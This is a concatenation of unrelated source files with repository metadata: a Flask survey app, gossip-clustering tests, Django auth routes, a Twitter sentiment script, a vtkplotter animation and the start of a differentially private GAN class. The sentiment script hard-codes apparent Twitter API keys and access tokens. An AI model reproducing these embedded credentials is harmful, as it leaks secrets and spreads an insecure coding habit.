    conformity = IntegerField("Do you think restraint of actions against social norms is important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    security = IntegerField("Do you value safety, harmony and stability of society, of relationships, and of self? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    # Openness to change
    stimulation = IntegerField("Do you prefer novel and exciting challenges in life? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    self_direction = IntegerField("Do you think independent thought and action are important (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    # Self-transcendence
    benevolence = IntegerField("Are preserving and enhancing the welfare of your friends and family the most important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    universalism = IntegerField("I find it important to understand, tolerate, appreciate and protect all ethnicities and people. (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
    submit = SubmitField("Submit")
@app.route('/', methods=['POST','GET'])
def values_quiz():
    """Serve the values survey; on a valid submit, persist the answers and
    render the aggregated results chart.

    GET (or invalid POST): re-render the survey form.
    POST (valid): store a Survey row, collapse the ten answers into the four
    Schwartz higher-order groups, and plot them as percentages of the total.
    """
    form = MCQ()
    if form.validate_on_submit():
        post = Survey(age=form.age.data, email=form.email.data, profession=form.profession.data, power=form.power.data,
                    tradition=form.tradition.data, achievement=form.achievement.data, stimulation=form.stimulation.data,
                    hedonism=form.hedonism.data, conformity=form.conformity.data, self_direction=form.self_direction.data,
                    benevolence=form.benevolence.data, universalism=form.universalism.data, security=form.security.data)
        db.session.add(post)
        db.session.commit()
        flash(f'Survey is completed by {form.email.data}', 'success')

        power = form.power.data
        tradition = form.tradition.data
        achievement = form.achievement.data
        # BUG FIX: a trailing comma here previously made `stimulation` a
        # 1-tuple, which broke every arithmetic use below.
        stimulation = form.stimulation.data
        hedonism = form.hedonism.data
        conformity = form.conformity.data
        self_direction = form.self_direction.data
        benevolence = form.benevolence.data
        universalism = form.universalism.data
        security = form.security.data

        values = [power, tradition, achievement, stimulation, hedonism, conformity, security, self_direction, benevolence, universalism]
        values_labels = ['Openness to Change', 'Self-Transcendence',
                'Conservation', 'Self-Enchancement']
        # NOTE(review): hedonism is counted in both groups below; Schwartz
        # places it between the two, but confirm this double-count is intended.
        openness = [hedonism, stimulation, self_direction]
        self_enhancement = [hedonism, achievement, power]
        conservation = [tradition, conformity, security]
        self_trans = [universalism, benevolence]

        # BUG FIX: was `sum(v[0] for c in values)`, which raised NameError on
        # `v`; the intent is simply the sum of all ten answers.
        total_sum = sum(values)
        open_sum = round(sum(openness)/total_sum*100)
        enhance_sum = round(sum(self_enhancement)/total_sum*100)
        trans_sum = round(sum(self_trans)/total_sum*100)
        cons_sum = round(sum(conservation)/total_sum*100)
        sum_v = [open_sum, enhance_sum, trans_sum, cons_sum]

        # BUG FIX: there are four bars/labels, so four tick positions are
        # needed (the old list had five and broke xticks/bar pairing).
        ran = [20, 40, 60, 80]
        plt.xticks(ran, values_labels)
        # Calling bar plot function
        plt.bar(ran, sum_v)
        plt.title('Percentage obtained on each dynamic values')
        plt.ylabel('Percentage')
        plt.xlabel('Dynamic value types')
        # NOTE(review): plt.show() returns None, so `image` is always None and
        # a GUI window is opened server-side; consider savefig()/base64 instead.
        return render_template('data_dashboard.html', image=plt.show())
    else:
        flash('Ensure all questions are answered correctly', 'warning')
    return render_template('MCQ.html', form=form)
@app.route('/results', methods=['GET', 'POST'])
def data_dashboard():
    """Render the results page.

    The chart itself is produced by values_quiz(); this view only serves the
    template.  plt.show() returns None, so `image` is always None — kept for
    template compatibility.  A large block of dead, commented-out duplicate
    plotting code was removed from this function.
    """
    return render_template('data_dashboard.html', image=plt.show())
if __name__ == "__main__":
app.run(debug=True)
| [
"andreliu2004@gmail.com"
] | andreliu2004@gmail.com |
b6c35090a87a08f91a9ef3303b9b4a5b23fcbb98 | a5aabe2e4057d78e687a57a6b560516a7cdb5836 | /tests/extreme/clustering/test_tman.py | c4cab7f0ccaa18b6d758bf361d21d8e50575424a | [
"MIT"
] | permissive | aratz-lasa/py-unsserv | 0ffc09ddab65a11ce917d0faa8b1b5dff091e563 | 6f332385e55d05953186b9a8b7848bca4b878e18 | refs/heads/master | 2022-12-14T21:10:12.397834 | 2020-05-03T11:29:49 | 2020-05-03T11:29:49 | 228,329,158 | 5 | 0 | MIT | 2022-12-08T07:00:55 | 2019-12-16T07:35:20 | Python | UTF-8 | Python | false | false | 4,202 | py | import asyncio
from collections import Counter
from functools import partial
from math import ceil
import pytest
from tests.utils import init_extreme_membership
from unsserv.common.gossip.config import GossipConfig
from unsserv.common.structs import Node
from unsserv.extreme.clustering.t_man import TMan
init_extreme_membership = init_extreme_membership # for flake8 compliance
CLUSTERING_SERVICE_ID = "tman"
@pytest.mark.asyncio
@pytest.fixture
async def init_tman():
    # Factory fixture: builds one TMan clustering service per membership node,
    # joins them all to the same service id, and tears every instance down at
    # fixture finalization (even if the test body fails).
    tman = None
    r_tmans = []
    async def _init_tman(newc, r_newcs):
        # Join the local node plus each remote node; neighbours are ranked by
        # port distance from the node that owns the ranking function.
        nonlocal tman, r_tmans
        tman = TMan(newc)
        await tman.join(
            CLUSTERING_SERVICE_ID, ranking_function=partial(port_distance, tman.my_node)
        )
        for r_newc in r_newcs:
            r_tman = TMan(r_newc)
            await r_tman.join(
                CLUSTERING_SERVICE_ID,
                ranking_function=partial(port_distance, r_tman.my_node),
            )
            r_tmans.append(r_tman)
        return tman, r_tmans
    try:
        yield _init_tman
    finally:
        # Always leave the clustering service so background tasks stop.
        await tman.leave()
        for r_tman in r_tmans:
            await r_tman.leave()
def port_distance(my_node: Node, ranked_node: Node):
    """Absolute difference between the two nodes' port numbers."""
    my_port = my_node.address_info[1]
    ranked_port = ranked_node.address_info[1]
    return abs(ranked_port - my_port)
@pytest.mark.asyncio
@pytest.mark.parametrize(
    "amount",
    [GossipConfig.LOCAL_VIEW_SIZE * 2 + 1, GossipConfig.LOCAL_VIEW_SIZE * 2 + 5, 100],
)
async def test_join_tman(init_extreme_membership, init_tman, amount):
    """After gossip converges, most nodes should hold at least half of their
    ideal (port-distance-closest) neighbours."""
    newc, r_newcs = await init_extreme_membership(amount)
    tman, r_tmans = await init_tman(newc, r_newcs)
    # Two waits: let membership stabilise, then let T-Man views converge.
    await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 7)
    await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 45)
    cluster_nodes = [tman] + r_tmans
    satisfy_ideal_neighbours = []
    for cluster in cluster_nodes:
        neighbours = set(cluster.get_neighbours())
        key_function = partial(port_distance, cluster.my_node)
        # Slice [1:...] skips index 0, which is the node itself (distance 0).
        ideal_neighbours = set(
            sorted(map(lambda c_n: c_n.my_node, cluster_nodes), key=key_function)[
                1 : GossipConfig.LOCAL_VIEW_SIZE + 1
            ]
        )
        # A node "satisfies" if it found at least half of its ideal neighbours.
        satisfies_half_ideal_neighbours = min(
            amount, GossipConfig.LOCAL_VIEW_SIZE
        ) * 0.5 <= len(ideal_neighbours.intersection(neighbours))
        satisfy_ideal_neighbours.append(satisfies_half_ideal_neighbours)
    # Probabilistic protocol: require only a majority of nodes to satisfy.
    assert sum(satisfy_ideal_neighbours) / (amount + 1) >= 0.5
@pytest.mark.asyncio
@pytest.mark.parametrize(
    "amount",
    [
        GossipConfig.LOCAL_VIEW_SIZE + 1,
        GossipConfig.LOCAL_VIEW_SIZE + 5,
        GossipConfig.LOCAL_VIEW_SIZE + 100,
    ],
)
async def test_leave_tman(init_extreme_membership, init_tman, amount):
    """After a node leaves, it should (mostly) disappear from the remaining
    nodes' views once gossip has had time to propagate the departure."""
    newc, r_newcs = await init_extreme_membership(amount)
    tman, r_tmans = await init_tman(newc, r_newcs)
    await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 7)
    await tman.leave()
    await newc.leave()
    # Give the remaining nodes time to age the departed node out.
    await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 40)
    # Frequency of every node across all remaining local views.
    all_nodes = Counter(
        [
            item
            for sublist in map(lambda n: n.get_neighbours(), r_tmans)
            for item in sublist
        ]
    )
    # NOTE(review): the name says "ten percent" but the factor is 0.2 (20%).
    nodes_ten_percent = ceil(amount * 0.2)
    # The departed node must be gone, or at worst among the rarest stragglers.
    assert newc.my_node not in all_nodes.keys() or newc.my_node in set(
        map(lambda p: p[0], all_nodes.most_common()[-nodes_ten_percent:])
    )
@pytest.mark.asyncio
@pytest.mark.parametrize(
    "amount",
    [
        (GossipConfig.LOCAL_VIEW_SIZE * 2) + 1,
        (GossipConfig.LOCAL_VIEW_SIZE * 2) + 5,
        (GossipConfig.LOCAL_VIEW_SIZE * 2) + 100,
    ],
)  # very high neighbours amount,
# to assure neighbours will change, because it is initialized by Newscast
async def test_tman_handler(init_extreme_membership, init_tman, amount):
    """The neighbours-changed handler must fire with a list once views churn."""
    newc, r_newcs = await init_extreme_membership(amount)
    tman, r_tmans = await init_tman(newc, r_newcs)
    handler_event = asyncio.Event()
    async def handler(local_view):
        # The handler receives the new local view; flag that it was invoked.
        assert isinstance(local_view, list)
        nonlocal handler_event
        handler_event.set()
    tman.add_neighbours_handler(handler)
    await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 15)
    assert handler_event.is_set()
| [
"aratzml@opendeusto.es"
] | aratzml@opendeusto.es |
475f48e7502aeb5696e6f5a6fcf4b7325d61683d | 02a39a3391b011d69034d51fe447bb53cc5c3c89 | /cancer/authentications/urls.py | 88766f64862044b2bde9817cae805601cea800b0 | [] | no_license | warlikedhruv/djnago-lung-cancer-prediction | a35dbaca9214f7211da1bb5630a9680d5c98e021 | 3990cc4502214a19592f8d7e5a7ca93125fed950 | refs/heads/main | 2023-06-22T22:05:57.769444 | 2021-07-12T13:55:27 | 2021-07-12T13:55:27 | 385,265,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | from django.urls import path, include
from .views import logout, login, register
# Authentication routes; the view callables are imported from .views above.
urlpatterns = [
    path('login', login, name='login'),
    path('register', register, name='register'),
    path('logout', logout, name='logout')
]
| [
"63941632+warlikedhruv@users.noreply.github.com"
] | 63941632+warlikedhruv@users.noreply.github.com |
a6959477826fd63adfb926c0f40332beeb4dadfd | 171610ea4157109b1f271fda241330c29a66c581 | /classobj.py | e7d382418ac0bff0106f3d786abab9a28c93f66e | [] | no_license | DerrenDsouza/Python-Programming | 731e3ba38c38d40b8bb32913e22753c2e43a30ad | 62286a1c2534a986b77227d7b3397630d8dbd4fb | refs/heads/master | 2020-04-25T08:44:17.574478 | 2019-09-07T06:55:01 | 2019-09-07T06:55:01 | 172,656,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | class student:
    # Class-level default; each instance immediately shadows it in __init__.
    h=0
    def __init__(self):
        """Set the instance attribute h to 6 (shadows the class-level h)."""
        self.h=6
    def my_func(self,k):
        """Print a greeting, overwrite self.h with k, then print the new value."""
        print("hi I am in class")
        self.h=k
        print(self.h)
# Demo: every new instance starts with h == 6 from __init__.
o=student()
print(o.h)
o1=student()
print(o1.h)
# my_func overwrites h per instance (prints the greeting and the new value).
o.my_func(2)
o1.my_func(4)
# A fresh instance is unaffected by the other instances' updates.
o3=student()
print(o3.h)
"noreply@github.com"
] | DerrenDsouza.noreply@github.com |
1350cf16a2da56ca1ba8ffd444d30e82fdde2cb4 | 2a2b36a603e1fefeaca902381b6377a44bb503af | /tp/models/entity.py | 328462036afe3f53184468ea48d3ba29ee070271 | [] | no_license | nenad/TPpy | 1c3f848df48f4cef4a6dcd3fb01efa401d0457a3 | 8b261cdea8e1d418288397d8e62ad2b9a7246385 | refs/heads/master | 2021-05-30T23:26:26.344356 | 2016-04-15T13:14:57 | 2016-04-15T13:14:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | import types
class EntityType:
def __init__(self):
pass
BUG = 'Bug'
USERSTORY = 'UserStory'
TASK = 'Task'
class Entity:
def __init__(self):
self.id = 0 # Integer
def __str__(self):
return self.to_JSON()
def to_JSON(self):
jsonstr = ''
for var in self.__dict__:
value = self.__dict__[var]
if value is not None:
if isinstance(value, types.ListType):
jsonstr += var + ':\n'
if len(value) == 0:
jsonstr += '\tempty' + '\n'
for obj in value:
jsonstr += '\t\n'.join(['\t' + line for line in obj.__str__().splitlines()]) + '\n\n'
else:
jsonstr += var + ' => ' + value.__str__() + '\n'
return jsonstr
| [
"n.stojanovik@voxteneo.com.mk"
] | n.stojanovik@voxteneo.com.mk |
3ff3f10ea73afba3d28f0fe60aab194cddbc1ed0 | 250967d919697ceaa9115e1f1a2ff96ff6cb22bb | /chapter 5/HW05-02.py | b392296fa2c1302face6863ce17f6f288fd5b480 | [] | no_license | saikirankondapalli03/pythonmath | 881ba67ba49b0c62e4b3dab474864b9df45e338f | 283493c90bf4af2fabd69016de397d141cba75e8 | refs/heads/master | 2020-06-18T04:21:45.269512 | 2019-10-15T15:38:08 | 2019-10-15T15:38:08 | 196,162,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,601 | py | '''
@author Sai
File name: HW05-02.py
Date created: 7/22/2019
Date last modified: 7/22/2019
Python Version: 3.1
This file is all about proof of law of large numbers in python
for law of large numbers please refer to
a) https://en.wikipedia.org/wiki/Law_of_large_numbers
b) https://en.wikipedia.org/wiki/Law_of_large_numbers#/media/File:Lawoflargenumbers.svg
'''
import random
import symbol
def roll():
    """Simulate one roll of a fair six-sided die (returns an int in 1..6)."""
    outcome = random.randint(1, 6)
    return outcome
def calculate_avg(no_of_trials):
    """Roll a die `no_of_trials` times and return the mean outcome.

    Raises ZeroDivisionError for no_of_trials == 0 (same as the original).
    """
    # Idiom fix: a comprehension replaces the manual counter/append loop
    # (the old `i = 0` seed variable was dead code).
    outcomes = [roll() for _ in range(no_of_trials)]
    return sum(outcomes) / len(outcomes)
from pylab import plot,show,title, xlabel, ylabel, legend , savefig
if __name__ == "__main__":
input_trials = [10,100,1000,10000,100000,500000]
output_trials = []
for input in input_trials:
result= calculate_avg(input)
output_trials.append(result)
print(input_trials)
print(output_trials)
#we already know that theoritical mean is 3.5 (as per the calculation in page no 143 from the textbook )
#So for any number of trials , it is always close to 3.5
#So , now given that input_trials = [10,100,1000,10000,100000,500000] is of length 6 , create input of length 6 in which each element is 3.5
theoritical_mean_trials = [3.5,3.5,3.5,3.5,3.5,3.5]
plot(input_trials, output_trials, input_trials, theoritical_mean_trials )
title('Average dice roll by number of trials')
xlabel('Number of trials')
ylabel('Observed averages')
legend(['Theotrical Mean','Observed averages'])
show()
| [
"saikirankondapalli03@gmail.com"
] | saikirankondapalli03@gmail.com |
a950d52c318d45b409f3ab1fe17a0e058800c942 | 256c6f6d9cabc1cb3b81e8a7deb4ca847bb8712a | /nlpproject/asgi.py | 37bde0b1c8f62bcbe29898da1a90dcf83f007e5c | [] | no_license | rtodinova/FakeNewsDetection | a871766b7487490202f83d615ebbee99f7578755 | 345d94e13c3d11a8caa8fd5fc075c6c90bbfb548 | refs/heads/master | 2020-12-27T06:28:24.326436 | 2020-02-15T09:49:44 | 2020-02-15T09:49:44 | 237,795,548 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
ASGI config for nlpproject project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Fall back to the project settings module unless the environment overrides it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'nlpproject.settings')
# Module-level ASGI callable discovered by ASGI servers (e.g. daphne/uvicorn).
application = get_asgi_application()
| [
"rtodinova@uni-sofia.bg"
] | rtodinova@uni-sofia.bg |
ea4001e48094948ae3c803340f078418ff9e8753 | 2651a539efcf5501488786f125860ecb7e2d3169 | /textblob_sentiments.py | 85fd4b68a39931910d93ae1bc3f64d48441690a8 | [] | no_license | patankaraditya1/Twitter-Sentiment-Analysis | 4f968efc506eda7a59dfd3edde3435094370e813 | b948dfd4a005740303e418327a0c603f7ba27bde | refs/heads/master | 2020-03-12T00:46:55.871101 | 2018-04-20T12:21:12 | 2018-04-20T12:21:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,541 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Mar 24 10:55:25 2018
@author: ADITYA
"""
import sys,tweepy,csv,re
import textblob
#from textblob import TextBlob
import matplotlib.pyplot as plt
class SentimentAnalysis:
    """Fetch tweets for a keyword, score each with TextBlob, and report results.

    DownloadData() drives the whole pipeline: prompt for a search term and a
    tweet count, bucket each tweet's sentiment polarity into seven classes,
    append the cleaned tweet texts to result.csv, print a textual summary and
    draw a pie chart of the class percentages.
    """

    def __init__(self):
        self.tweets = []     # raw tweepy status objects from the last search
        self.tweetText = []  # cleaned, UTF-8-encoded tweet bodies

    def DownloadData(self):
        """Interactively search Twitter, classify sentiment, and show a report."""
        # SECURITY(review): API credentials are hard-coded; move them to
        # environment variables / a secrets store and rotate the exposed keys.
        consumerKey = 'dPPKLnVHGcELkDvkiuNZzPACA'
        consumerSecret = 'TMwm95swlF782tx5rTWQGvLS3knaXlT59TNu2YY8yRKy8BQmi0'
        accessToken = '2375257315-TBmrA0ylrG5dTVDAaaDx8jyQm6INHiRNtoQDfBY'
        accessTokenSecret = 'Hob8EgVlroUJSeiSFVqPwOIgtueEJm5zpJJ62XG4IT8nT'
        auth = tweepy.OAuthHandler(consumerKey, consumerSecret)
        auth.set_access_token(accessToken, accessTokenSecret)
        api = tweepy.API(auth)

        # input for term to be searched and how many tweets to search
        searchTerm = input("Enter Keyword/Tag to search about: ")
        NoOfTerms = int(input("Enter how many tweets to search: "))

        # searching for tweets
        self.tweets = tweepy.Cursor(api.search, q=searchTerm, lang = "en").items(NoOfTerms)

        # counters for the seven polarity buckets plus the polarity running sum
        polarity = 0
        positive = 0
        wpositive = 0
        spositive = 0
        negative = 0
        wnegative = 0
        snegative = 0
        neutral = 0

        # iterating through tweets fetched
        for tweet in self.tweets:
            # Append to temp so that we can store in csv later. I use encode UTF-8
            self.tweetText.append(self.cleanTweet(tweet.text).encode('utf-8'))
            # BUG FIX: the module is imported as `textblob` (the
            # `from textblob import TextBlob` line is commented out), so the
            # bare name `TextBlob` raised NameError here.
            analysis = textblob.TextBlob(tweet.text)
            polarity += analysis.sentiment.polarity  # adding up polarities to find the average later
            # Bucket the polarity: 0 is neutral; (0, 1] splits into weak /
            # plain / strong positive; [-1, 0) mirrors that for negative.
            if (analysis.sentiment.polarity == 0):
                neutral += 1
            elif (analysis.sentiment.polarity > 0 and analysis.sentiment.polarity <= 0.3):
                wpositive += 1
            elif (analysis.sentiment.polarity > 0.3 and analysis.sentiment.polarity <= 0.6):
                positive += 1
            elif (analysis.sentiment.polarity > 0.6 and analysis.sentiment.polarity <= 1):
                spositive += 1
            elif (analysis.sentiment.polarity > -0.3 and analysis.sentiment.polarity <= 0):
                wnegative += 1
            elif (analysis.sentiment.polarity > -0.6 and analysis.sentiment.polarity <= -0.3):
                negative += 1
            elif (analysis.sentiment.polarity > -1 and analysis.sentiment.polarity <= -0.6):
                snegative += 1

        # ROBUSTNESS: `with` guarantees the CSV file is closed even on error
        # (the old code opened it early and closed it manually).
        with open('result.csv', 'a') as csvFile:
            csv.writer(csvFile).writerow(self.tweetText)

        # finding average of how people are reacting (as formatted strings)
        positive = self.percentage(positive, NoOfTerms)
        wpositive = self.percentage(wpositive, NoOfTerms)
        spositive = self.percentage(spositive, NoOfTerms)
        negative = self.percentage(negative, NoOfTerms)
        wnegative = self.percentage(wnegative, NoOfTerms)
        snegative = self.percentage(snegative, NoOfTerms)
        neutral = self.percentage(neutral, NoOfTerms)

        # finding average reaction
        polarity = polarity / NoOfTerms

        # printing out data
        print("How people are reacting on " + searchTerm + " by analyzing " + str(NoOfTerms) + " tweets.")
        print()
        print("General Report: ")
        if (polarity == 0):
            print("Neutral")
        elif (polarity > 0 and polarity <= 0.3):
            print("Weakly Positive")
        elif (polarity > 0.3 and polarity <= 0.6):
            print("Positive")
        elif (polarity > 0.6 and polarity <= 1):
            print("Strongly Positive")
        elif (polarity > -0.3 and polarity <= 0):
            print("Weakly Negative")
        elif (polarity > -0.6 and polarity <= -0.3):
            print("Negative")
        elif (polarity > -1 and polarity <= -0.6):
            print("Strongly Negative")

        print()
        print("Detailed Report: ")
        print(str(positive) + "% people thought it was positive")
        print(str(wpositive) + "% people thought it was weakly positive")
        print(str(spositive) + "% people thought it was strongly positive")
        print(str(negative) + "% people thought it was negative")
        print(str(wnegative) + "% people thought it was weakly negative")
        print(str(snegative) + "% people thought it was strongly negative")
        print(str(neutral) + "% people thought it was neutral")

        self.plotPieChart(positive, wpositive, spositive, negative, wnegative, snegative, neutral, searchTerm, NoOfTerms)

    def cleanTweet(self, tweet):
        """Strip handles/special characters from a tweet and collapse whitespace."""
        # NOTE(review): the third alternative contains literal spaces, so URL
        # stripping likely does not work as intended — kept as-is to preserve
        # behavior; verify before tightening the pattern.
        return ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t]) | (\w +:\ / \ / \S +)", " ", tweet).split())

    # function to calculate percentage
    def percentage(self, part, whole):
        """Return part/whole as a percentage string with two decimals."""
        temp = 100 * float(part) / float(whole)
        return format(temp, '.2f')

    def plotPieChart(self, positive, wpositive, spositive, negative, wnegative, snegative, neutral, searchTerm, noOfSearchTerms):
        """Draw a pie chart of the seven sentiment buckets (inputs are % strings)."""
        labels = ['Positive [' + str(positive) + '%]', 'Weakly Positive [' + str(wpositive) + '%]','Strongly Positive [' + str(spositive) + '%]', 'Neutral [' + str(neutral) + '%]',
                  'Negative [' + str(negative) + '%]', 'Weakly Negative [' + str(wnegative) + '%]', 'Strongly Negative [' + str(snegative) + '%]']
        # BUG FIX: percentage() returns formatted strings; plt.pie() expects
        # numeric wedge sizes, so convert back to float here.
        sizes = [float(v) for v in
                 (positive, wpositive, spositive, neutral, negative, wnegative, snegative)]
        colors = ['yellowgreen','lightgreen','darkgreen', 'gold', 'red','lightsalmon','darkred']
        patches, texts = plt.pie(sizes, colors=colors, startangle=90)
        plt.legend(patches, labels, loc="best")
        plt.title('How people are reacting on ' + searchTerm + ' by analyzing ' + str(noOfSearchTerms) + ' Tweets.')
        plt.axis('equal')
        plt.tight_layout()
        plt.show()
if __name__== "__main__":
sa = SentimentAnalysis()
sa.DownloadData() | [
"noreply@github.com"
] | patankaraditya1.noreply@github.com |
7bf05a660f374d99b85ca4d77340b5fcd77ccf5c | c4a25d72f38dedf224431c968c8894ab1b72a2d5 | /job/admin.py | 4b66d950b677ae90c4ecb16a59a763e309a9570f | [] | no_license | ahmedsaad2011559/django-Job-Board | d38fb345eaa88a8e4a38259e27001b34cecca6e9 | 7ca4b2c931730af461bcbb3f429507a365dc3407 | refs/heads/main | 2023-06-29T20:55:46.036656 | 2021-08-06T09:11:23 | 2021-08-06T09:11:23 | 391,702,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | from django.contrib import admin
# Register your models here.
from .models import Job,Category
# Expose Job and Category in the Django admin with the default ModelAdmin.
admin.site.register(Job)
admin.site.register(Category)
| [
"ahmed2011559.ahmedsaadmohamed989@gmail.com"
] | ahmed2011559.ahmedsaadmohamed989@gmail.com |
8b8cc3dcee06ab2783d556bc60df2a47668c5d00 | ffcce7bc3d82f19a2e024549f9fe3cd8e8702203 | /examples/other/animation2.py | 465af025dde5cf668f825fb115e5caad8b1f804a | [
"MIT"
] | permissive | jlqzzz/vtkplotter | 97f122e533b7f7d2dae1d7523d96326fbe5b8b60 | 6d28cb79153ddef29bc7b0bd19ddde655dcc392c | refs/heads/master | 2022-03-25T03:15:44.487184 | 2019-12-02T18:50:10 | 2019-12-02T18:50:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | """
This example shows how to animate simultaneously various objects
by specifying event times and durations of the visual effects.
"""
from vtkplotter import *
s = load(datadir+"bunny.obj").subdivide().normalize()  # refined, unit-scaled mesh
vp = Animation()
vp.timeResolution = 0.02  # secs
vp.switchOn(s)
# no need to repeat t=1, duration=3 in changeLighting and changeColor
vp.meshErode(corner=0, t=1, duration=3).changeLighting("glossy").changeColor("v")
# Two camera poses; the animation interpolates from cam1 to cam2.
cam1 = orientedCamera(backoffVector=(0, 0, -1), backoff=8)
cam2 = orientedCamera(backoffVector=(1, 1, 1), backoff=8)
vp.moveCamera(cam1, cam2, t=0, duration=4)
vp.play()
| [
"marco.musy@gmail.com"
] | marco.musy@gmail.com |
fe34abe7832b4c957422ee6ce3e3eb4df632a86d | ebcc40516adba151e6a1c772223b0726899a26eb | /tests/io_/test_versions.py | 462e87461b8534cdaa4886943c80729df6647e0a | [
"MIT"
] | permissive | spacetx/slicedimage | acf4a767f87b6ab78e657d85efad22ee241939f4 | eb8e1d3899628db66cffed1370f2a7e6dd729c4f | refs/heads/master | 2021-04-09T10:53:15.057821 | 2020-05-26T17:40:11 | 2020-05-26T17:40:11 | 125,316,414 | 7 | 4 | MIT | 2020-05-26T17:40:15 | 2018-03-15T05:24:24 | Python | UTF-8 | Python | false | false | 374 | py | from packaging import version
from slicedimage import VERSIONS
def test_version_increasing_order():
    """Verifies that the VERSIONS list is in increasing order."""
    parsed = [version.parse(v.VERSION) for v in VERSIONS]
    for earlier, later in zip(parsed, parsed[1:]):
        assert earlier < later
| [
"noreply@github.com"
] | spacetx.noreply@github.com |
6ae190b578bc78b85ffd969badfc177eb882069a | 1a0aba15348d5524c0d4a3fbe485f764bb9a0661 | /Class2_Python3/example_01000_for_loops.py | db1a51ca4c802012fbd1863bf6d97ee950215016 | [] | no_license | tazi337/smartninjacourse | dde55356e562134d5aa11b1c9e8c08efcbc53c60 | 93e7e5050c164b69fe20f251a787db6c6505a831 | refs/heads/master | 2023-05-13T18:30:13.679080 | 2019-12-12T17:30:59 | 2019-12-12T17:30:59 | 212,634,378 | 0 | 0 | null | 2023-05-02T17:57:02 | 2019-10-03T17:06:58 | HTML | UTF-8 | Python | false | false | 66 | py | # Schleife mit range
# Print the numbers 0 through 9, one per line.
for number in range(10):
    print(number)
| [
"tamara.zimmermann@otago.at"
] | tamara.zimmermann@otago.at |
f6bc874570ce5b3666fce15e4418c8b90e0ec31b | 8697515393180e6160edf7174412a5b73031e7c9 | /Advanced_DP_CGAN/gan/Base_DP_CGAN.py | 0b8a920910ee635ceca7f83c441cfe3dda309c98 | [
"Apache-2.0"
] | permissive | reihaneh-torkzadehmahani/DP-CGAN | 83d9cfdfeb36b6bf8fd2a37ce2c5debde513ecfe | 639ce4d261ee3202ab72ea5fe4ece916272bf524 | refs/heads/master | 2021-11-22T05:41:40.422952 | 2021-10-12T10:48:38 | 2021-10-12T10:48:38 | 162,071,578 | 27 | 7 | Apache-2.0 | 2019-09-18T08:36:20 | 2018-12-17T03:51:04 | Python | UTF-8 | Python | false | false | 19,493 | py | # -*- coding: utf-8 -*-
from __future__ import division
import time
import tensorflow as tf
from mlxtend.data import loadlocal_mnist
from sklearn.preprocessing import label_binarize
from sklearn.multiclass import OneVsRestClassifier
from sklearn.metrics import roc_curve, auc
from sklearn import svm
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.naive_bayes import BernoulliNB
from sklearn.ensemble import AdaBoostClassifier
from sklearn.neural_network import MLPClassifier
from gan.utils import *
from gan.ops import *
from differential_privacy.privacy_accountant.tf import accountant
from differential_privacy.optimizer import base_dp_optimizer
base_dir = "./"
class Base_DP_CGAN(object):
model_name = "Basic_DP_CGAN" # name for checkpoint
    def __init__(
            self,
            sess,
            epoch,
            z_dim,
            batch_size,
            sigma,
            clipping,
            delta,
            epsilon,
            learning_rate,
            dataset_name,
            base_dir,
            result_dir):
        """Configure the DP-CGAN trainer.

        Args:
            sess: TensorFlow session used to run all graph ops.
            epoch: maximum number of training epochs.
            z_dim: dimensionality of the generator noise vector.
            batch_size: minibatch size (also the number of DP microbatches).
            sigma: Gaussian noise multiplier for the DP optimizer.
            clipping: per-example L2 gradient clipping norm.
            delta: target delta of the (epsilon, delta)-DP guarantee.
            epsilon: target epsilon value(s) tracked by the accountant
                (max() is taken over it during training, so a list is expected).
            learning_rate: discriminator learning rate (generator uses 125x it).
            dataset_name: 'mnist' or 'fashion-mnist'; anything else raises.
            base_dir: where the dataset is loaded from.
            result_dir: where outputs are written.
        """
        # Moments accountant tracks cumulative privacy loss; 60000 is the
        # assumed training-set size (MNIST has 60k training images).
        self.accountant = accountant.GaussianMomentsAccountant(60000)
        self.sess = sess
        self.dataset_name = dataset_name
        self.base_dir = base_dir
        self.result_dir = result_dir
        self.epoch = epoch
        self.batch_size = batch_size
        self.sigma = sigma
        self.clipping = clipping
        self.delta = delta
        self.epsilon = epsilon
        self.learning_rate = learning_rate
        if dataset_name == 'mnist' or dataset_name == 'fashion-mnist':
            # parameters
            self.input_height = 28
            self.input_width = 28
            self.output_height = 28
            self.output_width = 28
            self.z_dim = z_dim  # dimension of noise-vector
            self.y_dim = 10  # dimension of condition-vector (label)
            self.c_dim = 1
            # train
            self.beta1 = 0.5
            # test
            self.sample_num = 64  # number of generated images to be saved
            # load mnist
            self.data_X, self.data_y = load_mnist(self.dataset_name, self.base_dir)
            # get number of batches for a single epoch
            self.num_batches = len(self.data_X) // self.batch_size
        else:
            raise NotImplementedError
    def discriminator(self, x, y, is_training=True, reuse=False):
